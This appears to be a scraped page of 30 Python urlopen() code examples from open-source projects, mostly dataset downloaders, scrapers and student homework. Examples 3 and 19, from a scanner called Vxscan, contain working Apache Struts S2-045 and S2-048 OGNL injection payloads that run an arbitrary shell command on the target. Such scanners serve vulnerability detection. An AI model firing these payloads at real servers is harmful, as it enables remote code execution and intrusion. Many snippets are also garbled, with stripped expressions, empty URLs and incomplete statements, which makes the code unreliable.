Python urllib.request.urlopen() Examples
The following are 30
code examples of urllib.request.urlopen().
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Example #1
Source File: From gog-galaxy-plugin-downloader with GNU General Public License v3.0 | 9 votes |
def get_plugin_config(config_uri): """ Downloads/opens configuration yaml file, returns dict of Galaxy plugins """ # Try to open the URI as a URL or fall back to opening local file try: config_uri_parsed = urlparse(config_uri) if config_uri_parsed.scheme in ['https', 'http']: url = urlopen(config_uri) yaml_data = else: with open(config_uri, 'r') as file_data: yaml_data = except URLError as e: print(e) # Parse the YAML configuration try: plugin_data = yaml.safe_load(yaml_data) return plugin_data['plugins'] except yaml.YAMLError as e: print(e)
Example #2
Source File: L.E.S.M.A. - Fabrica de Noobs From L.E.S.M.A with Apache License 2.0 | 7 votes |
def run(self): request = self.request try: if ((timeit.default_timer() - self.starttime) <= self.timeout and not SHUTDOWN_EVENT.isSet()): try: f = urlopen(request) except TypeError: # PY24 expects a string or buffer # This also causes issues with Ctrl-C, but we will concede # for the moment that Ctrl-C on PY24 isn't immediate request = build_request(self.request.get_full_url(), f = urlopen(request) f.close() self.result = sum( else: self.result = 0 except (IOError, SpeedtestUploadTimeout): self.result = sum(
Example #3
Source File: From Vxscan with Apache License 2.0 | 7 votes |
def st045(self): try: cmd = self.linux header = dict() header[ "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header[ "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(,#ros)).(#ros.flush())}" r = request.Request(self.url, headers=header) text = request.urlopen(r).read() except http.client.IncompleteRead as e: text = e.partial except Exception: pass if 'text' in locals().keys(): self.random = str(self.random) if self.random.encode('utf-8') in text and len(text) < 15: self.result.append('Apache S2-045 Vulnerability: ' + self.url)
Example #4
Source File: From dynamic-training-with-apache-mxnet-on-aws with Apache License 2.0 | 7 votes |
def test_connection(name, url, timeout=10): """Simple connection test""" urlinfo = urlparse(url) start = time.time() try: ip = socket.gethostbyname(urlinfo.netloc) except Exception as e: print('Error resolving DNS for {}: {}, {}'.format(name, url, e)) return dns_elapsed = time.time() - start start = time.time() try: _ = urlopen(url, timeout=timeout) except Exception as e: print("Error open {}: {}, {}, DNS finished in {} sec.".format(name, url, e, dns_elapsed)) return load_elapsed = time.time() - start print("Timing for {}: {}, DNS: {:.4f} sec, LOAD: {:.4f} sec.".format(name, url, dns_elapsed, load_elapsed))
Example #5
Source File: From neural-fingerprinting with BSD 3-Clause "New" or "Revised" License | 7 votes |
def download_image(image_id, url, x1, y1, x2, y2, output_dir): """Downloads one image, crops it, resizes it and saves it locally.""" output_filename = os.path.join(output_dir, image_id + '.png') if os.path.exists(output_filename): # Don't download image if it's already there return True try: # Download image url_file = urlopen(url) if url_file.getcode() != 200: return False image_buffer = # Crop, resize and save image image ='RGB') w = image.size[0] h = image.size[1] image = image.crop((int(x1 * w), int(y1 * h), int(x2 * w), int(y2 * h))) image = image.resize((299, 299), resample=Image.ANTIALIAS) except IOError: return False return True
Example #6
Source File: From fetchLandsatSentinelFromGoogleCloud with MIT License | 6 votes |
def download_metadata_file(url, outputdir, program): """Download and unzip the catalogue files.""" zipped_index_path = os.path.join(outputdir, 'index_' + program + '.csv.gz') if not os.path.isfile(zipped_index_path): if not os.path.exists(os.path.dirname(zipped_index_path)): os.makedirs(os.path.dirname(zipped_index_path)) print("Downloading Metadata file...") content = urlopen(url) with open(zipped_index_path, 'wb') as f: shutil.copyfileobj(content, f) index_path = os.path.join(outputdir, 'index_' + program + '.csv') if not os.path.isfile(index_path): print("Unzipping Metadata file...") with as gzip_index, open(index_path, 'wb') as f: shutil.copyfileobj(gzip_index, f) return index_path
Example #7
Source File: From pyhanlp with Apache License 2.0 | 6 votes |
def hanlp_releases(cache=True): global HANLP_RELEASES if cache and HANLP_RELEASES: return HANLP_RELEASES # print('Request GitHub API') req = urllib.Request('') req.add_header('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36') if PY == 3: content = urllib.urlopen(req).read() else: content = urllib.urlopen(req).read() content = json.loads(content.decode()) jar_version, jar_url, data_version, data_url = content meta = [(jar_version, jar_url, data_version, data_url)] HANLP_RELEASES = meta return meta
Example #8
Source File: From IGMC with MIT License | 6 votes |
def download_dataset(dataset, files, data_dir): """ Downloads dataset if files are not present. """ if not np.all([os.path.isfile(data_dir + f) for f in files]): url = "" + dataset.replace('_', '-') + '.zip' request = urlopen(url) print('Downloading %s dataset' % dataset) if dataset in ['ml_100k', 'ml_1m']: target_dir = 'raw_data/' + dataset.replace('_', '-') elif dataset == 'ml_10m': target_dir = 'raw_data/' + 'ml-10M100K' else: raise ValueError('Invalid dataset option %s' % dataset) with ZipFile(BytesIO( as zip_ref: zip_ref.extractall('raw_data/') os.rename(target_dir, data_dir) #shutil.rmtree(target_dir)
Example #9
Source File: From Recipes with MIT License | 6 votes |
def download_dataset(path, source='' 'cifar-10-python.tar.gz'): """ Downloads and extracts the dataset, if needed. """ files = ['data_batch_%d' % (i + 1) for i in range(5)] + ['test_batch'] for fn in files: if not os.path.exists(os.path.join(path, 'cifar-10-batches-py', fn)): break # at least one file is missing else: return # dataset is already complete print("Downloading and extracting %s into %s..." % (source, path)) if sys.version_info[0] == 2: from urllib import urlopen else: from urllib.request import urlopen import tarfile if not os.path.exists(path): os.makedirs(path) u = urlopen(source) with, mode='r|gz') as f: f.extractall(path=path) u.close()
Example #10
Source File: From script.module.inputstreamhelper with MIT License | 6 votes |
def _http_request(url, headers=None, time_out=10): """Perform an HTTP request and return request""" log(0, 'Request URL: {url}', url=url) try: if headers: request = Request(url, headers=headers) else: request = Request(url) req = urlopen(request, timeout=time_out) log(0, 'Response code: {code}', code=req.getcode()) if 400 <= req.getcode() < 600: raise HTTPError('HTTP %s Error for url: %s' % (req.getcode(), url), response=req) except (HTTPError, URLError) as err: log(2, 'Download failed with error {}'.format(err)) if yesno_dialog(localize(30004), '{line1}\n{line2}'.format(line1=localize(30063), line2=localize(30065))): # Internet down, try again? return _http_request(url, headers, time_out) return None return req
Example #11
Source File: From QCElemental with BSD 3-Clause "New" or "Revised" License | 6 votes |
def get_sdf(self): """Function to return the SDF (structure-data file) of the PubChem object.""" from urllib.request import urlopen, Request from urllib.parse import quote from urllib.error import URLError if len(self.dataSDF) == 0: url = "{}/SDF?record_type=3d".format( quote(str(self.cid)) ) req = Request(url, headers={"Accept": "chemical/x-mdl-sdfile"}) try: self.dataSDF = urlopen(req).read().decode("utf-8") except URLError as e: msg = "Unable to open\n\n%s\n\ndue to the error\n\n%s\n\n" % (url, e) msg += "It is possible that 3D information does not exist for this molecule in the PubChem database\n" print(msg) raise ValidationError(msg) return self.dataSDF
Example #12
Source File: From dot2moon with MIT License | 6 votes |
def HTML(self, check): try: if self.UserAgent != None: page_html = urlopen(Request( self.target_url, headers={"User-Agent":self.UserAgent}), timeout=self.TimeOut).read().decode("utf-8") #If not, the default will be used else: page_html = urlopen( self.target_url, timeout=self.TimeOut).read().decode("utf-8") except HTTPError: page_html = "Can't get page source code" if self.verbose == True: print(" [+] Source code got from %s" % self.target_url) print("----START" + "-"*71) print(page_html) print("----END" + "-"*73) return(page_html)
Example #13
Source File: From dot2moon with MIT License | 6 votes |
def post(self, payload, request_par): data = parse.urlencode(request_par).encode() if self.UserAgent != None: req = Request( self.target_url, data=data, headers={"User-Agent":self.UserAgent}) conn = urlopen(req, timeout=self.TimeOut) else: conn = urlopen(self.target_url, data=data, timeout=self.TimeOut) html ="utf-8") page_size = len(html) if self.verbose == True: print(" [+] Source code got from %s" % payload) print("----START" + "-"*71) print(html) print("----END" + "-"*73) return(self.target_url, page_size, html, payload)
Example #14
Source File: From ffplayout-engine with GNU General Public License v3.0 | 5 votes |
def get_playlist(self): if stdin_args.playlist: self.json_file = stdin_args.playlist else: year, month, day = self.list_date.split('-') self.json_file = os.path.join( _playlist.path, year, month, self.list_date + '.json') if '://' in self.json_file: self.json_file = self.json_file.replace('\\', '/') try: req = request.urlopen(self.json_file, timeout=1, context=ssl._create_unverified_context()) b_time = req.headers['last-modified'] temp_time = time.strptime(b_time, "%a, %d %b %Y %H:%M:%S %Z") mod_time = time.mktime(temp_time) if mod_time > self.last_mod_time: self.clip_nodes = valid_json(req) self.last_mod_time = mod_time'Open: ' + self.json_file) validate_thread(self.clip_nodes) except (request.URLError, socket.timeout): self.eof_handling('Get playlist from url failed!', False) elif os.path.isfile(self.json_file): # check last modification from playlist mod_time = os.path.getmtime(self.json_file) if mod_time > self.last_mod_time: with open(self.json_file, 'r', encoding='utf-8') as f: self.clip_nodes = valid_json(f) self.last_mod_time = mod_time'Open: ' + self.json_file) validate_thread(self.clip_nodes) else: self.clip_nodes = None
Example #15
Source File: From nexus-exporter with Apache License 2.0 | 5 votes |
def _request_data(self): info_request = urllib2.Request( "{0}/service/rest/atlas/system-information".format(self._target)) info_request.add_header("Authorization", "Basic %s" % self._auth) self._info = json.loads(urllib2.urlopen(info_request).read()) data_request = urllib2.Request("{0}/service/metrics/data".format( self._target)) data_request.add_header("Authorization", "Basic %s" % self._auth) self._data = json.loads(urllib2.urlopen(data_request).read())
Example #16
Source File: From dot2moon with MIT License | 5 votes |
def PageSize(self, check): #If different User Agent is required if check == True: try: if self.UserAgent != None: page_size = len(urlopen(Request( self.target_url + "a", headers={"User-Agent":self.UserAgent}), timeout=self.TimeOut).read()) #If not, default will be used else: page_size = len(urlopen( self.target_url + "a", timeout=self.TimeOut).read()) except HTTPError as e: print(e) page_size = "Can't get default page size" if self.verbose == True: print(" [+] Default page size: %s bytes" % page_size) else: if self.UserAgent != None: page_size = len(urlopen(Request( self.target_url, headers={"User-Agent":self.UserAgent}), timeout=self.TimeOut).read()) #If not, default will be used else: page_size = len(urlopen( self.target_url, timeout=self.TimeOut).read()) if self.verbose == True: print(self.target_url, page_size) return(self.target_url, page_size)
Example #17
Source File: From recipe-box with MIT License | 5 votes |
def get_fn_letter_links(): # get list of pages with links to recipes base_url = '' search_url_str = 'recipes/a-z' url = '{}/{}/{}'.format(base_url, search_url_str, '') try: soup = BeautifulSoup(request.urlopen( request.Request(url, headers=HEADERS)).read(), "html.parser") page_link_items ='ul.o-IndexPagination__m-List li a') letter_links = [p['href'] for p in page_link_items] return letter_links except (HTTPError, URLError): print('Could not parse page {}'.format(url))
Example #18
Source File: From recipe-box with MIT License | 5 votes |
def get_all_recipes_epi(page_num): base_url = '' search_url_str = 'search/?content=recipe&page' url = '{}/{}={}'.format(base_url, search_url_str, page_num) try: soup = BeautifulSoup(request.urlopen( request.Request(url, headers=HEADERS)).read(), "html.parser") recipe_link_items ='div.results-group article.recipe-content-card a.view-complete-item') recipe_links = [r['href'] for r in recipe_link_items] return {base_url + r: get_recipe(base_url + r) for r in recipe_links} except (HTTPError, URLError): print('Could not parse page {}'.format(url)) return []
Example #19
Source File: From Vxscan with Apache License 2.0 | 5 votes |
def st048(self): cmd = self.linux payload = "name=%25%7B%28%23_%3D%27multipart%2fform-data%27%29.%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27" + cmd + "" payload = payload.encode('utf-8') try: r = request.urlopen(self.url + '/integration/saveGangster.action', payload) text = except http.client.IncompleteRead as e: text = e.partial except: text = b'' if 'text' in locals().keys(): self.random = str(self.random) if self.random.encode('utf-8') in text and len(text) < 15: self.result.append('Apache S2-048 Vulnerability: ' + self.url)
Example #20
Source File: From PythonHomework with MIT License | 5 votes |
def task_8( img_url: str = '' ) -> object: ''' Task 8: Module Args: img_url: address of an image Returns: result_img: an PIL Image Hints: * Make sure you have installed the PIL package * Take a look at first * You could easily find answers with Google ''' from urllib import request result_img = None # TODO: download the image from img_url with the request module # and add your student ID on it with draw_name() in the utils module # under src/. # You are allowed to change the img_url to your own image URL. from PIL import Image import utils resp = request.urlopen(img_url) result_img = result_img = utils.draw_text(result_img, "B06902100") # Display the image: # # Note: please comment this line when hand in. # If you are running on a server, use #'test.jpg') # and copy the file to local or use Jupyter Notebook to render. # End of TODO return result_img
Example #21
Source File: From PythonHomework with MIT License | 5 votes |
def task_8( img_url: str = '' ) -> object: ''' Task 8: Module Args: img_url: address of an image Returns: result_img: an PIL Image Hints: * Make sure you have installed the PIL package * Take a look at first * You could easily find answers with Google ''' from urllib import request result_img = None # TODO: download the image from img_url with the request module from PIL import Image import utils response = request.urlopen(img_url) result_img = result_img = utils.draw_text(result_img, 'b06209035') # and add your student ID on it with draw_text() in the utils module # under src/. # You are allowed to change the img_url to your own image URL. # Display the image: # # Note: please comment this line when hand in. # If you are running on a server, use #'test.jpg') # and copy the file to local or use Jupyter Notebook to render. # End of TODO return result_img
Example #22
Source File: From PythonHomework with MIT License | 5 votes |
def task_8( img_url: str = '' ) -> object: ''' Task 8: Module Args: img_url: address of an image Returns: result_img: an PIL Image Hints: * Make sure you have installed the PIL package * Take a look at first * You could easily find answers with Google ''' from urllib import request from PIL import Image result_img = None # TODO: download the image from img_url with the request module # and add your student ID on it with draw_name() in the utils module # under src/. import utils import io tmp = request.urlopen(img_url).read() result_img = result_img = utils.draw_text(result_img,'B07902096') # You are allowed to change the img_url to your own image URL. # Display the image: # # Note: please comment this line when hand in. # If you are running on a server, use #'test.jpg') # and copy the file to local or use Jupyter Notebook to render. # End of TODO return result_img
Example #23
Source File: From PythonHomework with MIT License | 5 votes |
def task_8( img_url: str = '' ) -> object: ''' Task 8: Module Args: img_url: address of an image Returns: result_img: an PIL Image Hints: * Make sure you have installed the PIL package * Take a look at first * You could easily find answers with Google ''' from urllib import request result_img = None # TODO: download the image from img_url with the request module # and add your student ID on it with draw_text() in the utils module # under src/. respond = request.urlopen(img_url) from PIL import Image result_img = from utils import draw_text my_id = "B07902007" # download image from img_url and add my ID to it draw_text(result_img, my_id) # You are allowed to change the img_url to your own image URL. # Display the image: # # Note: please comment this line when hand in. # If you are running on a server, use #'test.jpg') # and copy the file to local or use Jupyter Notebook to render. # End of TODO return result_img
Example #24
Source File: From PythonHomework with MIT License | 5 votes |
def task_8( img_url: str = '' ) -> object: ''' Task 8: Module Args: img_url: address of an image Returns: result_img: an PIL Image Hints: * Make sure you have installed the PIL package * Take a look at first * You could easily find answers with Google ''' from urllib import request result_img = None import utils import io # TODO: download the image from img_url with the request module # and add your student ID on it with draw_name() in the utils module # under src/. #參考網絡code完成fix from PIL import Image Arianrhod=request.urlopen(img_url).read() result_img = result_img = utils.draw_text(result_img, "b04505049") # You are allowed to change the img_url to your own image URL. # Display the image: # Note: please comment this line when hand in. # If you are running on a server, use #'test.jpg') # and copy the file to local or use Jupyter Notebook to render. # End of TODO return result_img
Example #25
Source File: From PythonHomework with MIT License | 5 votes |
def task_8( img_url: str = '' ) -> object: ''' Task 8: Module Args: img_url: address of an image Returns: result_img: an PIL Image Hints: * Make sure you have installed the PIL package * Take a look at first * You could easily find answers with Google ''' from urllib import request result_img = None # TODO: download the image from img_url with the request module # and add your student ID on it with draw_text() in the utils module # under src/. import utils import io from PIL import Image with request.urlopen(img_url) as response: r = result_img = result_img = utils.draw_text(result_img,'StudentID b07902063') # You are allowed to change the img_url to your own image URL. # Display the image: # # Note: please comment this line when hand in. # If you are running on a server, use #'test.jpg') # and copy the file to local or use Jupyter Notebook to render. # End of TODO return result_img
Example #26
Source File: From PythonHomework with MIT License | 5 votes |
def task_8( img_url: str = '' ) -> object: ''' Task 8: Module Args: img_url: address of an image Returns: result_img: an PIL Image Hints: * Make sure you have installed the PIL package * Take a look at first * You could easily find answers with Google ''' from urllib import request result_img = None # TODO: download the image from img_url with the request module # and add your student ID on it with draw_text() in the utils module # under src/. # You are allowed to change the img_url to your own image URL. # Display the image: # # Note: please comment this line when hand in. # If you are running on a server, use #'test.jpg') # and copy the file to local or use Jupyter Notebook to render. reslt_img = request.urlopen(img_url) from .. import ultis draw_text(result_img, 'r06522601', (0.0), (255,255,255))'test.jpg') # End of TODO return result_img
Example #27
Source File: From PythonHomework with MIT License | 5 votes |
def task_8( img_url: str = '' ) -> object: ''' Task 8: Module Args: img_url: address of an image Returns: result_img: an PIL Image Hints: * Make sure you have installed the PIL package * Take a look at first * You could easily find answers with Google ''' from urllib import request import utils import io store = request.urlopen(img_url) result_img = result_img = utils.draw_text(result_img, "B07902011") # TODO: download the image from img_url with the request module # and add your student ID on it with draw_text() in the utils module # under src/. # You are allowed to change the img_url to your own image URL. # Display the image: # # Note: please comment this line when hand in. # If you are running on a server, use #'test.jpg') # and copy the file to local or use Jupyter Notebook to render. # End of TODO return result_img
Example #28
Source File: From PythonHomework with MIT License | 5 votes |
def task_8( img_url: str = '' ) -> object: ''' Task 8: Module Args: img_url: address of an image Returns: result_img: an PIL Image Hints: * Make sure you have installed the PIL package * Take a look at first * You could easily find answers with Google ''' from urllib import request result_img = None # TODO: download the image from img_url with the request module # and add your student ID on it with draw_text() in the utils module # under src/. from PIL import Image import utils response = request.urlopen(img_url) result_img = result_img = utils.draw_text(result_img, "b07902005") # You are allowed to change the img_url to your own image URL. # Display the image: # # Note: please comment this line when hand in. # If you are running on a server, use #'test.jpg') # and copy the file to local or use Jupyter Notebook to render. # End of TODO return result_img
Example #29
Source File: From PythonHomework with MIT License | 5 votes |
def task_8( img_url: str = '' ) -> object: ''' Task 8: Module Args: img_url: address of an image Returns: result_img: an PIL Image Hints: * Make sure you have installed the PIL package * Take a look at first * You could easily find answers with Google ''' from urllib import request result_img = None # TODO: download the image from img_url with the request module # and add your student ID on it with draw_name() in the utils module # under src/. # You are allowed to change the img_url to your own image URL. # Display the image: # # Note: please comment this line when hand in. # If you are running on a server, use #'test.jpg') # and copy the file to local or use Jupyter Notebook to render. from PIL import Image import utils response = request.urlopen(img_url) result_img = result_img = utils.draw_text(result_img, "B07902017") # End of TODO return result_img
Example #30
Source File: From PythonHomework with MIT License | 5 votes |
def task_8( img_url: str = '' ) -> object: ''' Task 8: Module Args: img_url: address of an image Returns: result_img: an PIL Image Hints: * Make sure you have installed the PIL package * Take a look at first * You could easily find answers with Google ''' from PIL import Image, ImageFont, ImageDraw from urllib import request result_img = draw = ImageDraw.Draw(result_img) font = ImageFont.load_default().font draw.text((0, 0), "B06902079", (0, 0, 0), font=font) # TODO: download the image from img_url with the request module # and add your student ID on it with draw_name() in the utils module # under src/. # You are allowed to change the img_url to your own image URL. # Display the image: # # Note: please comment this line when hand in. # If you are running on a server, use #'test.jpg') # and copy the file to local or use Jupyter Notebook to render. # End of TODO return result_img